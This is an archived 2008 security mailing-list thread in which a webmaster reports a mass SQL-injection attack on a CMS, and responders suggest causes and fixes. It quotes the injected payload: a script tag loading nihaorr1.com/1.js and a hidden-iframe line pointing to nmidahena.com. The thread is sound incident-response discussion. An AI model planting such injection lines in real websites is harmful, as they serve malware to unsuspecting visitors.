Security Incidents mailing list archives
RE: eSafe quarantine: Re: Mysterious JavaScript appearance in website database
From: "Boaz Shunami" <BoazS () comsecglobal com>
Date: Tue, 15 Apr 2008 09:09:36 +0300
Hi Glenn, Looks like it can be any number of attack vectors. Your infrastructures are highly vulnerable (NT and IIS 4) and may contain lots of vulnerabilities you're not aware of. Moreover, your custom developed CMS which is probably ASP based may have application security vulnerabilities. Have you tried to search your user's computers hosts files for this domain (this may prove as an interesting attack vector). I would highly recommend segregating this application and its infrastructure from the internet (If possible). Best Regards, Boaz Shunami Comsec Consulting -----Original Message----- From: Jon Oberheide [mailto:jon () oberheide org] Sent: Tuesday, April 15, 2008 12:53 AM To: glenn () elaw org Cc: incidents () securityfocus com Subject: eSafe quarantine: Re: Mysterious JavaScript appearance in website database Looks like an SQL injection attack. Take a look in your MS-SQL database at the affected entries and I bet you'll see the nmidahena reference. Since this is a widespread, automated attack that has affected other sites, it's unlikely it was targeted at your specific organization or custom CMS. Give your codebase a thorough audit for SQL injection vectors. Regards, Jon Oberheide On Mon, 2008-04-14 at 16:03 -0700, Glenn Gillis wrote:
On Sunday, 2008-April-13 at 01:07:38.030 UTC, the CMS database of the U.S.-based NGO I work for mysteriously had a JavaScript URL appended
to
the titles of much of the content on our website: <script src=http://www.nihaorr1.com/1.js></script> NB: the last modified dates for all of the content containing a reference to this script are identical, right down the 1/100 second. The contents of the script apparently attempts to open an iframe to a non-existent domain, "nmidahena.com": document.writeln("<iframe width=\'10\' height=\'1\' src=\'http:\/\/www.nmidahena.com\/1.htm\'><\/iframe>"); I haven't found any reports of a new worm, etc. that might account for
this, but when I Google "nmidahena.com" I get over 100,000 hits for other sites on which this script is present. We are running a custom-developed CMS with MS-SQL Server 2000 as the backend, on Windows NT Server 4.0 SP6a and IIS 4.0 (Yes, I know! The
NT
Server is fully patched with whatever OS, IIS and SQL Server 2K
hotfixes
released prior to NT4's end-of-life declaration by MS, for what it's
worth.)
Anyone have an idea what might have caused this?
-- Jon Oberheide <jon () oberheide org> GnuPG Key: 1024D/F47C17FE Fingerprint: B716 DA66 8173 6EDD 28F6 F184 5842 1C89 F47C 17FE ********************************************************************************************** IMPORTANT: The contents of this email and any attachments are confidential. They are intended for the named recipient(s) only. If you have received this email in error, please notify the system manager or the sender immediately and do not disclose the contents to anyone or make copies thereof. *** eSafe scanned this email for viruses, vandals, and malicious content. *** **********************************************************************************************
Current thread:
- RE: eSafe quarantine: Re: Mysterious JavaScript appearance in website database Boaz Shunami (Apr 15)